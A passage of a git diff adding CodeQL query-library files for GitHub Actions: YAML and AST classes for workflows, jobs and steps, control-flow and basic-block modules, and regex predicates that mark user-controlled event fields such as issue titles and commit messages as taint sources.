getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + } + + /** + * An Actions On trigger within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#on. + */ + class On extends YamlNode, YamlMappingLikeNode { + Workflow workflow; + + On() { workflow.lookup("on") = this } + + /** Gets the workflow that this trigger is in. */ + Workflow getWorkflow() { result = workflow } + } + + /** A common class for `env` in workflow, job or step. */ + abstract class Env extends YamlNode, YamlMapping { } + + /** A workflow level `env` mapping. */ + class WorkflowEnv extends Env { + Workflow workflow; + + WorkflowEnv() { workflow.lookup("env") = this } + + /** Gets the workflow this field belongs to. */ + Workflow getWorkflow() { result = workflow } + } + + /** A job level `env` mapping. */ + class JobEnv extends Env { + Job job; + + JobEnv() { job.lookup("env") = this } + + /** Gets the job this field belongs to. */ + Job getJob() { result = job } + } + + /** A step level `env` mapping. */ + class StepEnv extends Env { + Step step; + + StepEnv() { step.lookup("env") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ + class Job extends StepsContainer { + string jobId; + Workflow workflow; + + Job() { this = workflow.getJobs().lookup(jobId) } + + /** + * Gets the ID of this job, as a string. + * This is the job's key within the `jobs` mapping. + */ + string getId() { result = jobId } + + /** + * Gets the ID of this job, as a YAML scalar node. + * This is the job's key within the `jobs` mapping. + */ + YamlString getIdNode() { workflow.getJobs().maps(result, this) } + + /** Gets the human-readable name of this job, if any, as a string. */ + string getName() { result = this.getNameNode().getValue() } + + /** Gets the human-readable name of this job, if any, as a YAML scalar node. */ + YamlString getNameNode() { result = this.lookup("name") } + + /** Gets the step at the given index within this job. */ + Step getStep(int index) { result.getJob() = this and result.getIndex() = index } + + /** Gets the `env` mapping in this job. */ + JobEnv getEnv() { result = this.lookup("env") } + + /** Gets the workflow this job belongs to. */ + Workflow getWorkflow() { result = workflow } + + /** Gets the value of the `if` field in this job, if any. */ + JobIf getIf() { result.getJob() = this } + + /** Gets the value of the `runs-on` field in this job. */ + JobRunson getRunsOn() { result.getJob() = this } + } + + /** + * An `if` within a job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idif. + */ + class JobIf extends YamlNode, YamlScalar { + Job job; + + JobIf() { job.lookup("if") = this } + + /** Gets the step this field belongs to. */ + Job getJob() { result = job } + } + + /** + * A `runs-on` within a job. + * See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idruns-on. + */ + class JobRunson extends YamlNode, YamlScalar { + Job job; + + JobRunson() { job.lookup("runs-on") = this } + + /** Gets the step this field belongs to. */ + Job getJob() { result = job } + } + + /** + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. + */ + class Step extends YamlNode, YamlMapping { + int index; + StepsContainer parent; + + Step() { this = parent.getSteps().getElement(index) } + + /** Gets the 0-based position of this step within the sequence of `steps`. */ + int getIndex() { result = index } + + /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ + Job getJob() { result = parent } + + /** Gets the `runs` this step belongs to, if the step belongs to a `runs` in a custom composite action. Has no result if the step belongs to a `job` in a workflow. */ + Runs getRuns() { result = parent } + + /** Gets the value of the `uses` field in this step, if any. */ + Uses getUses() { result.getStep() = this } + + /** Gets the value of the `run` field in this step, if any. */ + Run getRun() { result.getStep() = this } + + /** Gets the value of the `if` field in this step, if any. */ + StepIf getIf() { result.getStep() = this } + + /** Gets the value of the `env` field in this step, if any. */ + StepEnv getEnv() { result = this.lookup("env") } + + /** Gets the ID of this step, if any. */ + string getId() { result = this.lookup("id").(YamlString).getValue() } + } + + /** + * An `if` within a step. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsif. + */ + class StepIf extends YamlNode, YamlScalar { + Step step; + + StepIf() { step.lookup("if") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ + private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + + /** + * A `uses` field within an Actions job step, which references an action as a reusable unit of code. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsuses. + * + * For example: + * ``` + * uses: actions/checkout@v2 + * ``` + * + * Does not handle local repository references, e.g. `.github/actions/action-name`. + */ + class Uses extends YamlNode, YamlScalar { + Step step; + + Uses() { step.lookup("uses") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + string getGitHubRepository() { + result = + this.getValue().regexpCapture(usesParser(), 1) + "/" + + this.getValue().regexpCapture(usesParser(), 2) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + string getVersion() { result = this.getValue().regexpCapture(usesParser(), 3) } + } + + /** + * A `with` field within an Actions job step, which references an action as a reusable unit of code. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepswith. + * + * For example: + * ``` + * with: + * arg1: 1 + * arg2: abc + * ``` + */ + class With extends YamlNode, YamlMapping { + Step step; + + With() { step.lookup("with") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * A `ref:` field within an Actions `with:` specific to `actions/checkout` action. + * + * For example: + * ``` + * uses: actions/checkout@v2 + * with: + * ref: ${{ github.event.pull_request.head.sha }} + * ``` + */ + class Ref extends YamlNode, YamlString { + With with; + + Ref() { with.lookup("ref") = this } + + /** Gets the `with` field this field belongs to. */ + With getWith() { result = with } + } + + /** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ + string getASimpleReferenceExpression(YamlString node) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + node.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) + .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + /** Extracts the 'name' part from env.name */ + bindingset[name] + string getEnvName(string name) { result = name.regexpCapture("env\\.([A-Za-z0-9_]+)", 1) } + + /** + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. + */ + class Run extends YamlNode, YamlString { + Step step; + + Run() { step.lookup("run") = this } + + /** Gets the step that executes this `run` command. */ + Step getStep() { result = step } + } + + /** + * ALVARO + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds + */ + class Needs extends YamlNode { + Job job; + + Needs() { job.lookup("needs") = this } + + Job getJob() { result = job } + + Job getANeededJob() { + if this instanceof YamlString + then result.getId() = this.(YamlString).getValue() and result.getFile() = job.getFile() + else + if this instanceof YamlSequence + then + result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + result.getFile() = job.getFile() + else none() + } + } +} diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/ql/lib/codeql/actions/ast/internal/Yaml.qll new file mode 100644 index 00000000000..402ceae44ce --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Yaml.qll @@ -0,0 +1,50 @@ +/** + * Provides classes for working with YAML data. + * + * YAML documents are represented as abstract syntax trees whose nodes + * are either YAML values or alias nodes referring to another YAML value. + */ + +private import codeql.yaml.Yaml as LibYaml + +private module YamlSig implements LibYaml::InputSig { + import codeql.Locations + + class LocatableBase extends @yaml_locatable { + Location getLocation() { yaml_locations(this, result) } + + string toString() { none() } + } + + class NodeBase extends LocatableBase, @yaml_node { + NodeBase getChildNode(int i) { yaml(result, _, this, i, _, _) } + + string getTag() { yaml(this, _, _, _, result, _) } + + string getAnchor() { yaml_anchors(this, result) } + + override string toString() { yaml(this, _, _, _, _, result) } + } + + class ScalarNodeBase extends NodeBase, @yaml_scalar_node { + int getStyle() { yaml_scalars(this, result, _) } + + string getValue() { yaml_scalars(this, _, result) } + } + + class CollectionNodeBase extends NodeBase, @yaml_collection_node { } + + class MappingNodeBase extends CollectionNodeBase, @yaml_mapping_node { } + + class SequenceNodeBase extends CollectionNodeBase, @yaml_sequence_node { } + + class AliasNodeBase extends NodeBase, @yaml_alias_node { + string getTarget() { yaml_aliases(this, result) } + } + + class ParseErrorBase extends LocatableBase, @yaml_error { + string getMessage() { yaml_errors(this, result) } + } +} + +import LibYaml::Make diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll new file mode 100644 index 00000000000..cdc7b0cf24f --- /dev/null +++ b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll @@ -0,0 +1,445 @@ +/** Provides classes representing basic blocks. */ + +private import codeql.actions.Cfg +private import codeql.actions.Ast +private import codeql.Locations + +/** + * A basic block, that is, a maximal straight-line sequence of control flow nodes + * without branches or joins. + */ +class BasicBlock extends TBasicBlockStart { + /** Gets the scope of this basic block. */ + final CfgScope getScope() { result = this.getFirstNode().getScope() } + + /** Gets an immediate successor of this basic block, if any. */ + BasicBlock getASuccessor() { result = this.getASuccessor(_) } + + /** Gets an immediate successor of this basic block of a given type, if any. */ + BasicBlock getASuccessor(SuccessorType t) { + result.getFirstNode() = this.getLastNode().getASuccessor(t) + } + + /** Gets an immediate predecessor of this basic block, if any. */ + BasicBlock getAPredecessor() { result.getASuccessor() = this } + + /** Gets an immediate predecessor of this basic block of a given type, if any. */ + BasicBlock getAPredecessor(SuccessorType t) { result.getASuccessor(t) = this } + + /** Gets the control flow node at a specific (zero-indexed) position in this basic block. */ + Node getNode(int pos) { bbIndex(this.getFirstNode(), result, pos) } + + /** Gets a control flow node in this basic block. */ + Node getANode() { result = this.getNode(_) } + + /** Gets the first control flow node in this basic block. */ + Node getFirstNode() { this = TBasicBlockStart(result) } + + /** Gets the last control flow node in this basic block. */ + Node getLastNode() { result = this.getNode(this.length() - 1) } + + /** Gets the length of this basic block. */ + int length() { result = strictcount(this.getANode()) } + + /** + * Holds if this basic block immediately dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which is an immediate + * predecessor of `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 immediately dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate immediatelyDominates(BasicBlock bb) { bbIDominates(this, bb) } + + /** + * Holds if this basic block strictly dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 strictly dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate strictlyDominates(BasicBlock bb) { bbIDominates+(this, bb) } + + /** + * Holds if this basic block dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 dominates the basic + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate dominates(BasicBlock bb) { + bb = this or + this.strictlyDominates(bb) + } + + /** + * Holds if `df` is in the dominance frontier of this basic block. + * That is, this basic block dominates a predecessor of `df`, but + * does not dominate `df` itself. + * + * Example: + * + * ```rb + * def m x + * if x < 0 + * x = -x + * if x > 10 + * x = x - 1 + * end + * end + * puts x + * end + * ``` + * + * The basic block on line 8 is in the dominance frontier + * of the basic block starting on line 3 because that block + * dominates the basic block on line 4, which is a predecessor of + * `puts x`. Also, the basic block starting on line 3 does not + * dominate the basic block on line 8. + */ + predicate inDominanceFrontier(BasicBlock df) { + this.dominatesPredecessor(df) and + not this.strictlyDominates(df) + } + + /** + * Holds if this basic block dominates a predecessor of `df`. + */ + private predicate dominatesPredecessor(BasicBlock df) { this.dominates(df.getAPredecessor()) } + + /** + * Gets the basic block that immediately dominates this basic block, if any. + * + * That is, all paths reaching this basic block from some entry point + * basic block must go through the result, which is an immediate basic block + * predecessor of this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 is an immediate dominator of + * the basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block, and the `if` block + * is an immediate predecessor of `return 1`). + */ + BasicBlock getImmediateDominator() { bbIDominates(result, this) } + + /** + * Holds if this basic block strictly post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 strictly post-dominates the basic block on + * line 3 (all paths to the exit point of `m` from `puts "b"` must go + * through `puts "m"`). + */ + predicate strictlyPostDominates(BasicBlock bb) { bbIPostDominates+(this, bb) } + + /** + * Holds if this basic block post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 post-dominates the basic block on line 3 + * (all paths to the exit point of `m` from `puts "b"` must go through + * `puts "m"`). + */ + predicate postDominates(BasicBlock bb) { + this.strictlyPostDominates(bb) or + this = bb + } + + /** Holds if this basic block is in a loop in the control flow graph. */ + predicate inLoop() { this.getASuccessor+() = this } + + /** Gets a textual representation of this basic block. */ + string toString() { result = this.getFirstNode().toString() } + + /** Gets the location of this basic block. */ + Location getLocation() { result = this.getFirstNode().getLocation() } +} + +cached +private module Cached { + /** Internal representation of basic blocks. */ + cached + newtype TBasicBlock = TBasicBlockStart(Node cfn) { startsBB(cfn) } + + /** Holds if `cfn` starts a new basic block. */ + private predicate startsBB(Node cfn) { + not exists(cfn.getAPredecessor()) and exists(cfn.getASuccessor()) + or + cfn.isJoin() + or + cfn.getAPredecessor().isBranch() + or + /* + * In cases such as + * + * ```rb + * if x or y + * foo + * else + * bar + * ``` + * + * we have a CFG that looks like + * + * x --false--> [false] x or y --false--> bar + * \ | + * --true--> y --false-- + * \ + * --true--> [true] x or y --true--> foo + * + * and we want to ensure that both `foo` and `bar` start a new basic block, + * in order to get a `ConditionalBlock` out of the disjunction. + */ + + exists(cfn.getAPredecessor(any(BooleanSuccessor s))) + } + + /** + * Holds if `succ` is a control flow successor of `pred` within + * the same basic block. + */ + private predicate intraBBSucc(Node pred, Node succ) { + succ = pred.getASuccessor() and + not startsBB(succ) + } + + /** + * Holds if `cfn` is the `i`th node in basic block `bb`. + * + * In other words, `i` is the shortest distance from a node `bb` + * that starts a basic block to `cfn` along the `intraBBSucc` relation. + */ + cached + predicate bbIndex(Node bbStart, Node cfn, int i) = + shortestDistances(startsBB/1, intraBBSucc/2)(bbStart, cfn, i) + + /** + * Holds if the first node of basic block `succ` is a control flow + * successor of the last node of basic block `pred`. + */ + private predicate succBB(BasicBlock pred, BasicBlock succ) { succ = pred.getASuccessor() } + + /** Holds if `dom` is an immediate dominator of `bb`. */ + cached + predicate bbIDominates(BasicBlock dom, BasicBlock bb) = + idominance(entryBB/1, succBB/2)(_, dom, bb) + + /** Holds if `pred` is a basic block predecessor of `succ`. */ + private predicate predBB(BasicBlock succ, BasicBlock pred) { succBB(pred, succ) } + + /** Holds if `bb` is an exit basic block that represents normal exit. */ + private predicate normalExitBB(BasicBlock bb) { bb.getANode().(AnnotatedExitNode).isNormal() } + + /** Holds if `dom` is an immediate post-dominator of `bb`. */ + cached + predicate bbIPostDominates(BasicBlock dom, BasicBlock bb) = + idominance(normalExitBB/1, predBB/2)(_, dom, bb) + + /** + * Gets the `i`th predecessor of join block `jb`, with respect to some + * arbitrary order. + */ + cached + JoinBlockPredecessor getJoinBlockPredecessor(JoinBlock jb, int i) { + none() + /* + * result = + * rank[i + 1](JoinBlockPredecessor jbp | + * jbp = jb.getAPredecessor() + * | + * jbp order by JoinBlockPredecessors::getId(jbp), JoinBlockPredecessors::getSplitString(jbp) + * ) + */ + + } + + cached + predicate immediatelyControls(ConditionBlock cb, BasicBlock succ, BooleanSuccessor s) { + succ = cb.getASuccessor(s) and + forall(BasicBlock pred | pred = succ.getAPredecessor() and pred != cb | succ.dominates(pred)) + } + + cached + predicate controls(ConditionBlock cb, BasicBlock controlled, BooleanSuccessor s) { + exists(BasicBlock succ | cb.immediatelyControls(succ, s) | succ.dominates(controlled)) + } +} + +private import Cached + +/** Holds if `bb` is an entry basic block. */ +private predicate entryBB(BasicBlock bb) { bb.getFirstNode() instanceof EntryNode } + +/** + * An entry basic block, that is, a basic block whose first node is + * an entry node. + */ +class EntryBasicBlock extends BasicBlock { + EntryBasicBlock() { entryBB(this) } +} + +/** + * An annotated exit basic block, that is, a basic block whose last node is + * an annotated exit node. + */ +class AnnotatedExitBasicBlock extends BasicBlock { + private boolean normal; + + AnnotatedExitBasicBlock() { + exists(AnnotatedExitNode n | + n = this.getANode() and + if n.isNormal() then normal = true else normal = false + ) + } + + /** Holds if this block represent a normal exit. */ + final predicate isNormal() { normal = true } +} + +/** + * An exit basic block, that is, a basic block whose last node is + * an exit node. + */ +class ExitBasicBlock extends BasicBlock { + ExitBasicBlock() { this.getLastNode() instanceof ExitNode } +} + +/* + * private module JoinBlockPredecessors { + * private predicate id(AstNode x, AstNode y) { x = y } + * + * private predicate idOf(AstNode x, int y) = equivalenceRelation(id/2)(x, y) + * + * int getId(JoinBlockPredecessor jbp) { + * idOf(Ast::toTreeSitter(jbp.getFirstNode().(AstCfgNode).getAstNode()), result) + * or + * idOf(Ast::toTreeSitter(jbp.(EntryBasicBlock).getScope()), result) + * } + * + * string getSplitString(JoinBlockPredecessor jbp) { + * result = jbp.getFirstNode().(AstCfgNode).getSplitsString() + * or + * not exists(jbp.getFirstNode().(AstCfgNode).getSplitsString()) and + * result = "" + * } + * } + */ + +/** A basic block with more than one predecessor. */ +class JoinBlock extends BasicBlock { + JoinBlock() { this.getFirstNode().isJoin() } + + /** + * Gets the `i`th predecessor of this join block, with respect to some + * arbitrary order. + */ + JoinBlockPredecessor getJoinBlockPredecessor(int i) { result = getJoinBlockPredecessor(this, i) } +} + +/** A basic block that is an immediate predecessor of a join block. */ +class JoinBlockPredecessor extends BasicBlock { + JoinBlockPredecessor() { this.getASuccessor() instanceof JoinBlock } +} + +/** A basic block that terminates in a condition, splitting the subsequent control flow. */ +class ConditionBlock extends BasicBlock { + ConditionBlock() { this.getLastNode().isCondition() } + + /** + * Holds if basic block `succ` is immediately controlled by this basic + * block with conditional value `s`. That is, `succ` is an immediate + * successor of this block, and `succ` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate immediatelyControls(BasicBlock succ, BooleanSuccessor s) { + immediatelyControls(this, succ, s) + } + + /** + * Holds if basic block `controlled` is controlled by this basic block with + * conditional value `s`. That is, `controlled` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } +} + diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll new file mode 100644 index 00000000000..8b6696fe777 --- /dev/null +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -0,0 +1,169 @@ +private import codeql.actions.Ast +private import codeql.controlflow.Cfg as CfgShared +private import codeql.Locations + +module Completion { + private newtype TCompletion = + TSimpleCompletion() or + TBooleanCompletion(boolean b) { b in [false, true] } or + TReturnCompletion() + + abstract class Completion extends TCompletion { + abstract string toString(); + + predicate isValidForSpecific(AstNode e) { none() } + + predicate isValidFor(AstNode e) { this.isValidForSpecific(e) } + + abstract SuccessorType getAMatchingSuccessorType(); + } + + abstract class NormalCompletion extends Completion { } + + class SimpleCompletion extends NormalCompletion, TSimpleCompletion { + override string toString() { result = "SimpleCompletion" } + + override predicate isValidFor(AstNode e) { not any(Completion c).isValidForSpecific(e) } + + override NormalSuccessor getAMatchingSuccessorType() { any() } + } + + class BooleanCompletion extends NormalCompletion, TBooleanCompletion { + boolean value; + + BooleanCompletion() { this = TBooleanCompletion(value) } + + override string toString() { result = "BooleanCompletion(" + value + ")" } + + override predicate isValidForSpecific(AstNode e) { + none() + // TODO: add support for conditional expressions? + //e = any(ConditionalExpression c).getCondition() + } + + override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } + + final boolean getValue() { result = value } + } + + class ReturnCompletion extends Completion, TReturnCompletion { + override string toString() { result = "ReturnCompletion" } + + override predicate isValidForSpecific(AstNode e) { none() } + + override ReturnSuccessor getAMatchingSuccessorType() { any() } + } + + cached + private newtype TSuccessorType = + TNormalSuccessor() or + TBooleanSuccessor(boolean b) { b in [false, true] } or + TReturnSuccessor() + + class SuccessorType extends TSuccessorType { + string toString() { none() } + } + + class NormalSuccessor extends SuccessorType, TNormalSuccessor { + override string toString() { result = "successor" } + } + + class BooleanSuccessor extends SuccessorType, TBooleanSuccessor { + boolean value; + + BooleanSuccessor() { this = TBooleanSuccessor(value) } + + override string toString() { result = value.toString() } + + boolean getValue() { result = value } + } + + class ReturnSuccessor extends SuccessorType, TReturnSuccessor { + override string toString() { result = "return" } + } + // Why is there no conditional successor type? +} + +module CfgScope { + abstract class CfgScope extends AstNode { } + + private class JobScope extends CfgScope instanceof JobStmt { } +} + +private module Implementation implements CfgShared::InputSig { + import codeql.actions.Ast + import Completion + import CfgScope + + predicate completionIsNormal(Completion c) { not c instanceof ReturnCompletion } + + // Not using CFG splitting, so the following are just dummy types. + private newtype TUnit = Unit() + + class SplitKindBase = TUnit; + + class Split extends TUnit { + abstract string toString(); + } + + predicate completionIsSimple(Completion c) { c instanceof SimpleCompletion } + + predicate completionIsValidFor(Completion c, AstNode e) { c.isValidFor(e) } + + CfgScope getCfgScope(AstNode e) { + exists(AstNode p | p = e.getParentNode() | + result = p + or + not p instanceof CfgScope and result = getCfgScope(p) + ) + } + + int maxSplits() { result = 0 } + + predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(JobStmt), e) } + + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(JobStmt), e, c) } + + predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } + + predicate successorTypeIsCondition(SuccessorType t) { t instanceof BooleanSuccessor } + + SuccessorType getAMatchingSuccessorType(Completion c) { result = c.getAMatchingSuccessorType() } + + predicate isAbnormalExitType(SuccessorType t) { none() } +} + +module CfgImpl = CfgShared::Make; + +private import CfgImpl +private import Completion +private import CfgScope + +// Trees are what end up creating Cfg::Node objects and therefore DataFlow::Node objects. +// Its also required that there is parent/child relationships between nodes so orphans nodes will not appear as either Cfg::Node or DataFlow::Node. +// For example +// - ArgumentExpr should be children of UsesExpr, and UsesExpr should be children of StepStmt. +// TODO: We need to make VarAccess expressions part ot the tree as they are currently orphans +private class CfgNodeTree extends StandardPreOrderTree instanceof AstNode { + override AstNode getChildNode(int i) { result = super.getChildNodeByOrder(i) } +} +// private class JobStmtTree extends StandardPreOrderTree instanceof JobStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// private class StepStmtTree extends StandardPreOrderTree instanceof StepStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// // TODO: Do we need this or we can just care about the ExprAccessExpr +// private class ArgumentTree extends LeafTree instanceof ArgumentExpr { } +// +// private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } +// +// private class StepOutputAccessTree extends LeafTree instanceof StepOutputAccessExpr { } +// +// private class JobOutputAccessTree extends LeafTree instanceof JobOutputAccessExpr { } \ No newline at end of file diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll new file mode 100644 index 00000000000..5ce82a134ce --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -0,0 +1,137 @@ +import actions +import codeql.actions.DataFlow + +/** + * A data flow source. + */ +abstract class SourceNode extends DataFlow::Node { + /** + * Gets a string that represents the source kind with respect to threat modeling. + */ + abstract string getThreatModel(); +} + +/** A data flow source of remote user input. */ +abstract class RemoteFlowSource extends SourceNode { + /** Gets a string that describes the type of this remote flow source. */ + abstract string getSourceType(); + + override string getThreatModel() { result = "remote" } +} + +private class ChangedFilesSource extends RemoteFlowSource { + ChangedFilesSource() { + exists(UsesExpr uses | + uses.getTarget() = "tj-actions/changed-files" and + uses.getVersion() = ["v1", "v20", "v30", "v40"] and + uses = this.asExpr() + ) + } + + override string getSourceType() { result = "User-controlled list of changed files" } +} + +bindingset[context] +private predicate isExternalUserControlledIssue(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledPullRequest(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*title\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*body\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*label\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*default_branch\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*description\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*homepage\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*ref\\b", + "\\bgithub\\s*\\.\\s*head_ref\\b" + ] + | + context.regexpMatch(reg) + ) +} + +bindingset[context] +private predicate isExternalUserControlledReview(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*review\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledComment(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*comment\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledGollum(string context) { + context + .regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*page_name\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*title\\b") +} + +bindingset[context] +private predicate isExternalUserControlledCommit(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + ] + | + context.regexpMatch(reg) + ) +} + +bindingset[context] +private predicate isExternalUserControlledDiscussion(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*title\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledWorkflowRun(string context) { + 